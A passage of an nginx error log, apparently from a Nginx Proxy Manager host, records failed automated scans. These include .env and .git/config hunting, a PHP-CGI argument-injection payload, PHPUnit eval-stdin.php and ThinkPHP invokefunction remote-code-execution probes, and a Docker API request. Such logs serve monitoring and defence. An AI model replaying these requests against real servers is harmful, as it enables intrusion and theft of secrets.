client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env-anaconda HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:10 [error] 301#301: *24674 open() "/var/www/html/.env-api-keys" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env-api-keys HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:11 [error] 301#301: *24675 open() "/var/www/html/.env-app.conf" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env-app.conf HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:27:11 [error] 301#301: *24676 open() "/var/www/html/.env-app.json" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env-app.json HTTP/1.1", host: "91.82.215.191" +2026/01/28 06:57:56 [error] 301#301: *24780 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:27 [error] 301#301: *24783 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:29 [error] 301#301: *24783 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:29 [error] 301#301: *24783 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:29 [error] 301#301: *24783 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:30 [error] 301#301: *24783 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:30 [error] 301#301: *24783 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:31 [error] 301#301: *24783 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:31 [error] 301#301: *24783 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:32 [error] 301#301: *24783 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:32 [error] 301#301: *24783 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:33 [error] 301#301: *24783 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:33 [error] 301#301: *24783 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:34 [error] 301#301: *24783 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:34 [error] 301#301: *24783 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:35 [error] 301#301: *24783 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:36 [error] 301#301: *24783 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:36 [error] 301#301: *24783 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:37 [error] 301#301: *24783 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:37 [error] 301#301: *24783 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:37 [error] 301#301: *24783 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:38 [error] 301#301: *24783 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:38 [error] 301#301: *24783 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:39 [error] 301#301: *24783 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:40 [error] 301#301: *24783 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:40 [error] 301#301: *24783 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:41 [error] 301#301: *24783 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:41 [error] 301#301: *24783 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:42 [error] 301#301: *24783 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:42 [error] 301#301: *24783 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:43 [error] 301#301: *24783 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:43 [error] 301#301: *24783 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:43 [error] 301#301: *24783 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:44 [error] 301#301: *24783 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:45 [error] 301#301: *24783 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:45 [error] 301#301: *24783 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:46 [error] 301#301: *24783 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:47 [error] 301#301: *24783 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:47 [error] 301#301: *24783 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:48 [error] 301#301: *24783 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:48 [error] 301#301: *24783 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 06:58:50 [error] 301#301: *24783 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 101.36.107.228, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 07:43:44 [error] 301#301: *24810 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.148.10.124, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 07:43:53 [error] 301#301: *24812 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.148.10.124, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 08:29:39 [error] 302#302: *24844 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 08:47:51 [error] 302#302: *24848 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.156.212, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.215.191" +2026/01/28 08:49:51 [error] 300#300: *26336 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.156.212, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:15:36 [error] 301#301: *26351 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 09:47:04 [error] 302#302: *26371 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:05 [error] 302#302: *26372 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:05 [error] 302#302: *26373 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:05 [error] 302#302: *26374 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:05 [error] 302#302: *26375 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:06 [error] 302#302: *26376 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:06 [error] 302#302: *26379 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:06 [error] 302#302: *26380 open() "/var/www/html/app_dev.php/_profiler/open" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:06 [error] 302#302: *26381 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:06 [error] 302#302: *26382 "/var/www/html/info/index.html" is not found (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /info/ HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:06 [error] 302#302: *26383 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 302#302: *26384 "/var/www/html/phpinfo/index.html" is not found (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /phpinfo/ HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 299#299: *26385 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 299#299: *26386 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 299#299: *26387 open() "/var/www/html/.env.save" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env.save HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 299#299: *26388 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 299#299: *26389 open() "/var/www/html/img/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /img/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 299#299: *26390 open() "/var/www/html/vendor/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /vendor/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:07 [error] 299#299: *26391 open() "/var/www/html/php-info.php" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /php-info.php HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26392 "/var/www/html/inf/index.html" is not found (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /inf/ HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26393 open() "/var/www/html/upload/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /upload/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26394 open() "/var/www/html/includes/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /includes/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26395 open() "/var/www/html/APPS/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /APPS/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26396 open() "/var/www/html/application/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /application/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26397 open() "/var/www/html/.config" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.config HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26398 open() "/var/www/html/doc/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /doc/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:08 [error] 299#299: *26399 open() "/var/www/html/css/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /css/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 09:47:09 [error] 299#299: *26400 open() "/var/www/html/framework/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /framework/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 10:01:28 [error] 300#300: *26408 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 10:12:07 [error] 300#300: *26414 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 40.80.206.215, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "91.82.215.191" +2026/01/28 11:35:05 [error] 308#308: *27929 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 11:48:24 [error] 308#308: *27934 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 12:04:55 [error] 308#308: *27949 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 12:04:59 [error] 307#307: *29441 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 154.197.56.163, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.215.191" +2026/01/28 12:05:00 [error] 307#307: *29442 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 154.197.56.163, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.215.191" +2026/01/28 12:05:00 [error] 307#307: *29443 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 154.197.56.163, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.215.191" +2026/01/28 12:05:02 [error] 308#308: *29444 open() "/var/www/html/llms.txt" failed (2: No such file or directory), client: 154.197.56.163, server: localhost-nginx-proxy-manager, request: "GET /llms.txt HTTP/1.1", host: "91.82.215.191" +2026/01/28 12:05:14 [error] 308#308: *29446 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 14:46:14 [error] 306#306: *29559 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 213.209.159.181, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:46:54 [error] 306#306: *29560 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/28 14:57:40 [error] 306#306: *29562 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:40 [error] 306#306: *29563 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:40 [error] 306#306: *29564 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:41 [error] 306#306: *29565 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:41 [error] 306#306: *29566 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:41 [error] 306#306: *29567 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:41 [error] 306#306: *29568 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:41 [error] 306#306: *29569 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:41 [error] 307#307: *29570 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:41 [error] 307#307: *29571 open() "/var/www/html/m/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /m/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:42 [error] 307#307: *29572 open() "/var/www/html/remote/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /remote/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:42 [error] 307#307: *29573 open() "/var/www/html/webmail/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /webmail/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:42 [error] 307#307: *29574 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:42 [error] 307#307: *29575 open() "/var/www/html/vpn/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /vpn/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:44 [error] 307#307: *29576 open() "/var/www/html/secure/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /secure/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:45 [error] 307#307: *29577 open() "/var/www/html/shop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /shop/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:45 [error] 307#307: *29578 open() "/var/www/html/cloud/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /cloud/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:45 [error] 307#307: *29579 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:46 [error] 307#307: *29580 open() "/var/www/html/host/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /host/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:46 [error] 307#307: *29581 open() "/var/www/html/support/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /support/.env HTTP/1.1", host: "91.82.215.191" +2026/01/28 14:57:47 [error] 307#307: *29582 open() "/var/www/html/pop/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /pop/.env HTTP/1.1", host: "91.82.215.191" 